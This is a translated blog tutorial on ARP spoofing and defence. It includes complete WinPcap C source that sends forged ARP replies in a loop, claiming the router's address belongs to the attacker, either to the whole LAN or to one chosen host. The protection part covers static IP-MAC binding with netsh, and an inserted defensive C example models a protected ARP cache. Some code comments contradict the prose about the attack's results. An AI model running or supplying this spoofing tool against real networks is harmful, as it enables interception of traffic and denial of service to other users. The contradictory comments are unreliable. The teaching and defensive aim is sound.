ARP Protocol (5) ARP Attack and protection

Source: Internet
Author: User
Tags 0xc0

Part 1: ARP attack
First, recall what ARP is for: the basic function of the ARP protocol is to take the IP address of a target device and find that device's MAC address, so that communication on the link can proceed.

I described the concrete workings of ARP in "ARP Protocol (1): What is the ARP protocol"; the key points were:


Q: How is this mapping table generated? A:
(1) Each non-static record in the table has a lifetime of typically 20 minutes, counted from the moment it was created; once it expires it is deleted from the table. (To delete all entries by hand, use the command arp -d *.)
(2) When host A wants to send to B, A first looks in its ARP cache for a MAC address corresponding to B's IP. If there is one, A takes that MAC address, encapsulates the packet with it, and sends it out.
(3) If A does not find the MAC corresponding to B's IP in its ARP cache, it broadcasts on the LAN where A is located (or asks the gateway/router): "Who has the MAC for B's IP? Please tell A."
(4) If B is on the same LAN as A, B answers this message with its own MAC address; A then writes B's IP and MAC into its ARP cache (generally valid for 20 minutes).
(5) If B is not on the same LAN as A, and A's gateway knows B's MAC (directly, or indirectly by asking further), the gateway sends A a message carrying B's MAC address; when A receives it, A writes B's IP and MAC into its ARP cache (generally valid for 20 minutes).
(6) If nobody responds, the request times out and the other party cannot be reached.


The problem lies in step (4): if some host F answers A's request and claims that the MAC of the IP A asked about is X (not B's real MAC), A writes this into its IP-MAC cache, and from then on everything A sends to B actually goes to F. This is the deception.
If F forges the MAC of the LAN gateway, the attacked hosts on the same LAN as F will be unable to reach the network (every packet the attacked host sends to the gateway goes to F instead), until the IP-MAC entry in the attacked host's cache expires and it learns the correct gateway IP-MAC pair again.

From the above analysis, carrying out an ARP attack only requires sending a forged ARP reply packet to the attacked host on the LAN, so the code is very easy to write.
In the previous article we could already send ARP packets:

/* Function: src_mac broadcasts to the LAN: what is the MAC of target_ip 192.168.1.111? */
int Text1(Arp *arp)
{
    u_char dest_mac[6]   = {0xff,0xff,0xff,0xff,0xff,0xff};  // broadcast
    u_char src_mac[6]    = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};  // source MAC address f0-7b-cb-a3-15-85
    u_char sender_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};  // sender MAC f0-7b-cb-a3-15-85
    u_char sender_ip[4]  = {0xc0,0xa8,0x01,0x65};            // sender IP address 192.168.1.101
    u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00};  // target MAC left empty because it is not known yet
    u_char target_ip[4]  = {0xc0,0xa8,0x01,0x6f};            // target IP 192.168.1.111
    if (PacketArpRequest(arp, dest_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip) == -1) {
        printf("Packet ARP request error\n");
        return -1;
    }
    return 0;
}

We only need to change the parameters used in the Text1 function, as follows:

/* Experimental hosts
   XXH_MAC:    MAC of machine XXH      XXH_IP:    IP of machine XXH
   ROUTE_MAC:  MAC of the router       ROUTE_IP:  IP of the router
   MOBILE_MAC: MAC of the phone        MOBILE_IP: IP of the phone
   BROADCAST:  broadcast address
   XL_MAC:     MAC of machine XL       XL_IP:     IP of machine XL */
u_char xxh_mac[6]    = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};
u_char xxh_ip[4]     = {0xc0,0xa8,0x00,0x68};
u_char route_mac[6]  = {0x80,0x89,0x17,0xcf,0xe6,0x6e};
u_char route_ip[4]   = {0xc0,0xa8,0x00,0x01};
u_char mobile_mac[6] = {0x78,0xa8,0x73,0x82,0xbe,0xa4};
u_char mobile_ip[4]  = {0xc0,0xa8,0x00,0x66};
u_char broadcast[6]  = {0xff,0xff,0xff,0xff,0xff,0xff};
u_char xl_mac[6]     = {0x00,0x21,0x00,0x29,0x75,0x04};
u_char xl_ip[4]      = {0xc0,0xa8,0x00,0x6c};  // 192.168.0.108

/* Spoof host XL only: tell only XL that route_ip's MAC is xxh_mac */
int Text3(Arp *arp)
{
    // available: broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
    if (PacketArpReplay(arp, xl_mac, xxh_mac, xxh_mac, route_ip, xxh_mac, xxh_ip) == -1) {
        printf("Packet ARP request error\n");
        return -1;
    }
    return 0;
}

After this packet is sent, host XL can no longer access the Internet. Querying XL's ARP cache (arp -a) shows:

In the output, 192.168.0.1 now maps to the MAC of 192.168.0.104 (f0-7b-cb-a3-15-85 is the MAC of host XXH, 192.168.0.104), so host XL stays off the network until it relearns the correct gateway IP-MAC pair.

The scope of an ARP attack: the local area network.
What an ARP attack can do:
(1) With ARP spoofing, all packets from the attacked machine can be redirected to the attacker.
(2) With ARP spoofing, the attacked machine can be prevented from connecting to the Internet.

Can the ARP weakness be used to do something useful?
Walking home I imagined one usable method; it may never be used in production, but it offers a way of thinking:
In a distributed deployment, if a machine fails, the traffic addressed to that machine has to be redirected to another machine, and ARP can be used for that (how? you can work it out, can't you?). In real production environments there are better solutions, which we will discuss in detail in the future.

Part 2: ARP protection
From the above, an ARP attack mainly exploits this weakness of ARP: when a host does not find the IP-MAC pair in its cache, it sends a query to the LAN, and that is when it can be fed a forged answer.
So the attack depends on the host having to query for the IP-MAC pair. If the host always finds the pair in its cache, can the ARP attack be avoided?
Exactly!
As we said before, the general validity time of an ARP cache entry is 20 minutes, so how can we make sure the IP-MAC entry is always found?
Bind the IP-MAC pair! (somewhat similar to the concept of a static route)

In the last column of the screenshot, "Type", there are both dynamic and static entries. Dynamic is a temporary cache entry (20 minutes); Static is a permanent binding.
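The cache behaviour in steps (1) to (6) above, the overwrite that the Text3 reply relies on, and the static binding that defeats it, as an added example in C that is not part of the original article: a small ARP cache with dynamic and static entries, a parser that validates a 42-byte Ethernet/ARP frame (EtherType, hardware and protocol type and lengths, operation code) and checks that the Ethernet source matches the ARP sender address, and three scenarios using the article's own addresses (router 192.168.0.1 at 80-89-17-cf-e6-6e, XXH at f0-7b-cb-a3-15-85, XL at 192.168.0.108 / 00-21-00-29-75-04). The two frames are constructed for the example, not captures; the verdict names, the 16-entry table size and the function names are my choices. Note that the static entry blocks the overwrite whether or not XL had a request outstanding, which matters because the Text3 reply is unsolicited.

```c
#include <stdint.h>
#include <string.h>
#include <time.h>

#define ARP_FRAME_LEN   42          /* 14-byte Ethernet header + 28-byte ARP body */
#define ARP_TTL_SECONDS (20 * 60)   /* dynamic entry lifetime quoted in the article */
#define CACHE_SIZE      16          /* table size: my choice for this example */

typedef struct {
    uint8_t ip[4], mac[6];
    int     is_static;   /* 1 = bound by the administrator: never overwritten, never expires */
    time_t  learned;     /* when a dynamic entry was written */
    int     in_use;
} arp_entry;
typedef struct { arp_entry entries[CACHE_SIZE]; } arp_cache;
/* Verdicts returned by arp_cache_process_reply(); the names are my choice. */
enum { ARP_IGNORED, ARP_LEARNED, ARP_REFRESHED, ARP_CHANGED, ARP_SPOOF_SUSPECTED, ARP_MALFORMED };

/* ip == NULL finds a free slot; otherwise finds the in-use entry for that IP. */
static arp_entry *find_entry(arp_cache *c, const uint8_t *ip) {
    for (int i = 0; i < CACHE_SIZE; i++) {
        arp_entry *e = &c->entries[i];
        if (ip ? (e->in_use && memcmp(e->ip, ip, 4) == 0) : !e->in_use) return e;
    }
    return NULL;
}
/* Administrator binding: the in-memory counterpart of "netsh interface ipv4 add neighbors". */
int arp_cache_bind_static(arp_cache *c, const uint8_t ip[4], const uint8_t mac[6]) {
    arp_entry *e = find_entry(c, ip);
    if (!e && !(e = find_entry(c, NULL))) return -1;   /* table full */
    memcpy(e->ip, ip, 4); memcpy(e->mac, mac, 6);
    e->is_static = 1; e->in_use = 1; e->learned = 0;
    return 0;
}
/* Step (1): dynamic entries are dropped once they are 20 minutes old; static ones stay. */
void arp_cache_expire(arp_cache *c, time_t now) {
    for (int i = 0; i < CACHE_SIZE; i++) {
        arp_entry *e = &c->entries[i];
        if (e->in_use && !e->is_static && now - e->learned >= ARP_TTL_SECONDS) e->in_use = 0;
    }
}
/* Step (2): the lookup host A does before sending. Returns 1 and fills mac_out on a hit. */
int arp_cache_lookup(arp_cache *c, const uint8_t ip[4], uint8_t mac_out[6], time_t now) {
    arp_cache_expire(c, now);
    arp_entry *e = find_entry(c, ip);
    if (e) memcpy(mac_out, e->mac, 6);
    return e != NULL;
}
/* Step (4) with protection: validate an incoming frame, apply it to the cache, report the outcome. */
int arp_cache_process_reply(arp_cache *c, const uint8_t *frame, size_t len, time_t now) {
    if (len < ARP_FRAME_LEN) return ARP_MALFORMED;
    const uint8_t *eth = frame, *arp = frame + 14;
    if (eth[12] != 0x08 || eth[13] != 0x06) return ARP_IGNORED;                 /* EtherType is not ARP */
    if (memcmp(arp, "\x00\x01\x08\x00\x06\x04", 6) != 0) return ARP_MALFORMED;   /* HTYPE, PTYPE, HLEN, PLEN */
    if (arp[6] != 0x00 || arp[7] != 0x02) return ARP_IGNORED;                   /* only op 2 = reply */
    const uint8_t *sender_mac = arp + 8, *sender_ip = arp + 14;
    /* The Ethernet source and the ARP sender hardware address should agree. */
    if (memcmp(eth + 6, sender_mac, 6) != 0) return ARP_SPOOF_SUSPECTED;
    arp_cache_expire(c, now);
    arp_entry *e = find_entry(c, sender_ip);
    if (e && e->is_static)   /* a static binding is never overwritten by a reply */
        return memcmp(e->mac, sender_mac, 6) == 0 ? ARP_IGNORED : ARP_SPOOF_SUSPECTED;
    if (e) {                 /* dynamic entry: the reply overwrites it, which is what the attack relies on */
        int changed = memcmp(e->mac, sender_mac, 6) != 0;
        memcpy(e->mac, sender_mac, 6); e->learned = now;
        return changed ? ARP_CHANGED : ARP_REFRESHED;
    }
    if (!(e = find_entry(c, NULL))) return ARP_IGNORED;   /* table full: nothing learned */
    memcpy(e->ip, sender_ip, 4); memcpy(e->mac, sender_mac, 6);
    e->is_static = 0; e->in_use = 1; e->learned = now;
    return ARP_LEARNED;
}

/* Addresses from the article: router 192.168.0.1 / 80-89-17-cf-e6-6e, XXH f0-7b-cb-a3-15-85, XL 192.168.0.108.
   Both frames are constructed, not captured: replies to XL saying "192.168.0.1 is at <sender_mac>";
   the second one is the Text3 packet, in which XXH claims to be the router. */
static const uint8_t ROUTE_IP[4]  = {0xc0,0xa8,0x00,0x01};
static const uint8_t ROUTE_MAC[6] = {0x80,0x89,0x17,0xcf,0xe6,0x6e};
static const uint8_t XXH_MAC[6]   = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};
static const uint8_t LEGIT_REPLY[ARP_FRAME_LEN] = {
    0x00,0x21,0x00,0x29,0x75,0x04, 0x80,0x89,0x17,0xcf,0xe6,0x6e, 0x08,0x06, 0x00,0x01,0x08,0x00,0x06,0x04, 0x00,0x02,
    0x80,0x89,0x17,0xcf,0xe6,0x6e, 0xc0,0xa8,0x00,0x01, 0x00,0x21,0x00,0x29,0x75,0x04, 0xc0,0xa8,0x00,0x6c };
static const uint8_t SPOOFED_REPLY[ARP_FRAME_LEN] = {
    0x00,0x21,0x00,0x29,0x75,0x04, 0xf0,0x7b,0xcb,0xa3,0x15,0x85, 0x08,0x06, 0x00,0x01,0x08,0x00,0x06,0x04, 0x00,0x02,
    0xf0,0x7b,0xcb,0xa3,0x15,0x85, 0xc0,0xa8,0x00,0x01, 0x00,0x21,0x00,0x29,0x75,0x04, 0xc0,0xa8,0x00,0x6c };

/* No binding: the spoofed reply silently replaces the router's MAC. Returns 1 if the attack succeeded. */
int scenario_unbound(void) {
    arp_cache c = {0}; uint8_t mac[6];
    arp_cache_process_reply(&c, LEGIT_REPLY, ARP_FRAME_LEN, 1000);
    int verdict = arp_cache_process_reply(&c, SPOOFED_REPLY, ARP_FRAME_LEN, 1001);
    return arp_cache_lookup(&c, ROUTE_IP, mac, 1002) && verdict == ARP_CHANGED && memcmp(mac, XXH_MAC, 6) == 0;
}
/* Static binding: the same reply is flagged and the router's MAC survives. Returns 1 if protected. */
int scenario_bound(void) {
    arp_cache c = {0}; uint8_t mac[6];
    arp_cache_bind_static(&c, ROUTE_IP, ROUTE_MAC);
    int verdict = arp_cache_process_reply(&c, SPOOFED_REPLY, ARP_FRAME_LEN, 1001);
    return arp_cache_lookup(&c, ROUTE_IP, mac, 1002) && verdict == ARP_SPOOF_SUSPECTED && memcmp(mac, ROUTE_MAC, 6) == 0;
}
/* Expiry: a dynamic entry learned at t=0 is still there one second before 20 minutes and gone at 20 minutes. */
int scenario_expiry(void) {
    arp_cache c = {0}; uint8_t mac[6];
    arp_cache_process_reply(&c, LEGIT_REPLY, ARP_FRAME_LEN, 0);
    return arp_cache_lookup(&c, ROUTE_IP, mac, ARP_TTL_SECONDS - 1) && !arp_cache_lookup(&c, ROUTE_IP, mac, ARP_TTL_SECONDS);
}
```

All three scenario functions return 1. The Ethernet-source check alone does not catch the Text3 packet, because the forged frame is internally consistent (its Ethernet source and ARP sender are both XXH's MAC); what stops it is the static entry, which is exactly what the netsh binding below installs in the real Windows cache.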

How to bind?
1. View the network interfaces:
netsh interface ipv4 show interfaces   (abbreviated form: netsh i i show in)

On my computer the active, connected adapter has Idx 12.
2. Bind IP <---> MAC:
netsh -c "interface ipv4" add neighbors [Idx] [IP address] [MAC address]   (abbreviated form: netsh -c "i i" add neighbors ...)


192.168.1.1 and a8-57-4e-5c-92-56 are now bound (here: netsh -c "i i" add neighbors 12 192.168.1.1 a8-57-4e-5c-92-56).

A network administrator can also do the binding on the gateway.

This page is from my home router (I logged in from the phone, so the screenshot looks rather small).
It offers a "bind" button; after binding, the router is more secure.

PS: Now I think of it, at Thunder, when a new computer was issued and needed Internet access, its MAC had to be reported to the operations colleagues before it could go online. I did not understand at the time what they wanted the computer's MAC for; this is the reason.

You can also install an ARP firewall or similar software (I guess their principle is not the same).


OK, the whole ARP series is now complete. What do you think? Discussion is welcome:
Public account: search for "echo", or scan the QR code below to follow.


Source:

#if 0
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// pcap_findalldevs_ex
#define HAVE_REMOTE
#include <pcap.h>

/* Experimental hosts
   XXH_MAC:    MAC of machine XXH      XXH_IP:    IP of machine XXH
   ROUTE_MAC:  MAC of the router       ROUTE_IP:  IP of the router
   MOBILE_MAC: MAC of the phone        MOBILE_IP: IP of the phone
   BROADCAST:  broadcast address
   XL_MAC:     MAC of machine XL       XL_IP:     IP of machine XL */
u_char xxh_mac[6]    = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};
u_char xxh_ip[4]     = {0xc0,0xa8,0x00,0x68};
u_char route_mac[6]  = {0x80,0x89,0x17,0xcf,0xe6,0x6e};
u_char route_ip[4]   = {0xc0,0xa8,0x00,0x01};
u_char mobile_mac[6] = {0x78,0xa8,0x73,0x82,0xbe,0xa4};
u_char mobile_ip[4]  = {0xc0,0xa8,0x00,0x66};
u_char broadcast[6]  = {0xff,0xff,0xff,0xff,0xff,0xff};
u_char xl_mac[6]     = {0x00,0x21,0x00,0x29,0x75,0x04};
u_char xl_ip[4]      = {0xc0,0xa8,0x00,0x6c};  // 192.168.0.108

// Ethernet header
typedef struct EthHead {
    u_char dest_mac[6];  // Ethernet destination address
    u_char src_mac[6];   // Ethernet source address
    u_char type[2];      // frame type, ARP: 0x0806
} EthHead;

// ARP packet
typedef struct ArpMsg {
    u_char mac_type[2];       // hardware type, Ethernet: 1
    u_char protocal_type[2];  // protocol type, IP: 0x0800
    u_char mac_len;           // hardware address length: 6
    u_char protocal_len;      // protocol address length: 4
    u_char op[2];             // operation: ARP request 1, ARP reply 2, RARP request 3, RARP reply 4
    u_char sender_mac[6];     // sender Ethernet address
    u_char sender_ip[4];      // sender IP address
    u_char target_mac[6];     // target Ethernet address
    u_char target_ip[4];      // target IP address
} ArpMsg;

// Ethernet ARP frame
typedef struct Arp {
    EthHead eth_head;
    ArpMsg  arpmsg;
} Arp;

/* Function name: PacketArp
   Purpose: build an ARP packet
   Parameters: arp_req: ARP frame, output parameter
               op: operation, ARP request 1, ARP reply 2, RARP request 3, RARP reply 4
               dest_mac: Ethernet destination address   src_mac: Ethernet source address
               sender_mac: sender Ethernet address      sender_ip: sender IP address
               target_mac: target Ethernet address      target_ip: target IP address
   Return: 0 correct, -1 error */
int PacketArp(Arp *arp_req, u_char op, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
              u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
    if (arp_req == NULL) return -1;
    memcpy(arp_req->eth_head.dest_mac, dest_mac, 6);
    memcpy(arp_req->eth_head.src_mac, src_mac, 6);
    arp_req->eth_head.type[0] = 0x08;
    arp_req->eth_head.type[1] = 0x06;
    // arp_req->eth_head.type = htons(arp_req->eth_head.type);
    arp_req->arpmsg.mac_type[0] = 0x00;
    arp_req->arpmsg.mac_type[1] = 0x01;
    arp_req->arpmsg.protocal_type[0] = 0x08;
    arp_req->arpmsg.protocal_type[1] = 0x00;
    arp_req->arpmsg.mac_len = 0x06;
    arp_req->arpmsg.protocal_len = 0x04;
    arp_req->arpmsg.op[0] = 0x00;
    arp_req->arpmsg.op[1] = op;
    memcpy(arp_req->arpmsg.sender_mac, sender_mac, 6);
    memcpy(arp_req->arpmsg.sender_ip, sender_ip, 4);
    memcpy(arp_req->arpmsg.target_mac, target_mac, 6);
    memcpy(arp_req->arpmsg.target_ip, target_ip, 4);
    return 0;
}

// ARP request packet
int PacketArpRequest(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
                     u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
    return PacketArp(arp_req, 0x01, dest_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip);
}

// ARP reply packet
int PacketArpReplay(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
                    u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
    return PacketArp(arp_req, 0x02, dest_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip);
}

// Open the network adapter
pcap_if_t *choose_interface(void)
{
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum;
    int i = 0;
    char errbuf[PCAP_ERRBUF_SIZE];

    /* Retrieve the device list on the local machine */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }
    /* Print the list */
    for (d = alldevs; d; d = d->next) {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }
    if (i == 0) {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return NULL;
    }
    printf("Enter the interface number (1-%d):", i);
    scanf_s("%d", &inum);
    if (inum < 1 || inum > i) {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return NULL;
    }
    /* Jump to the selected adapter */
    for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++);
    return d;
}

/* XXH (192.168.0.104) broadcasts: what is the MAC of 192.168.0.102?
   Result: arp -a shows no result */
int Text1(Arp *arp)
{
    u_char dest_mac[6]   = {0xff,0xff,0xff,0xff,0xff,0xff};
    u_char src_mac[6]    = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};
    u_char sender_mac[6] = {0xf0,0x7b,0xcb,0xa3,0x15,0x85};
    u_char sender_ip[4]  = {0xc0,0xa8,0x00,0x68};  // sender IP address 192.168.0.104
    u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00};
    u_char target_ip[4]  = {0xc0,0xa8,0x00,0x66};  // 192.168.0.102
    if (PacketArpRequest(arp, dest_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip) == -1) {
        printf("Packet ARP request error\n");
        return -1;
    }
    return 0;
}

/* Whole-LAN spoof: broadcast that route_ip's MAC is xxh_mac, affecting every machine except XXH.
   Result: all machines are on the network */
int Text2(Arp *arp)
{
    // available: broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
    if (PacketArpReplay(arp, broadcast, xxh_mac, xxh_mac, route_ip, xxh_mac, xxh_ip) == -1) {
        printf("Packet ARP request error\n");
        return -1;
    }
    return 0;
}

/* Spoof XL only: tell only XL that route_ip's MAC is xxh_mac.
   Result: all machines are on the network */
int Text3(Arp *arp)
{
    // available: broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
    if (PacketArpReplay(arp, xl_mac, xxh_mac, xxh_mac, route_ip, xxh_mac, xxh_ip) == -1) {
        printf("Packet ARP request error\n");
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    pcap_t *fp;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[42];
    pcap_if_t *d = choose_interface();
    if (d == NULL) {
        exit(1);
    }
    char *source = d->name;

    /* Open the output device */
    if ((fp = pcap_open(source,                     // name of the device
                        100,                        // portion of the packet to capture (only the first 100 bytes)
                        PCAP_OPENFLAG_PROMISCUOUS,  // promiscuous mode
                        1000,                       // read timeout in ms (value lost in extraction; 1000 assumed)
                        NULL,                       // authentication on the remote machine
                        errbuf                      // error buffer
                        )) == NULL) {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", source);
        return 1;
    }
    Arp arp;
    if (Text3(&arp) == -1) {
        return 1;
    }
    memcpy(packet, (void *)&arp, 42);
    /* Send down the packet */
    while (1) {
        if (pcap_sendpacket(fp, packet, 42 /* size */) != 0) {
            fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
            return 1;
        }
        printf("Sleep()\n");
        Sleep(2000);
    }
    return 0;
}
#endif



Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.

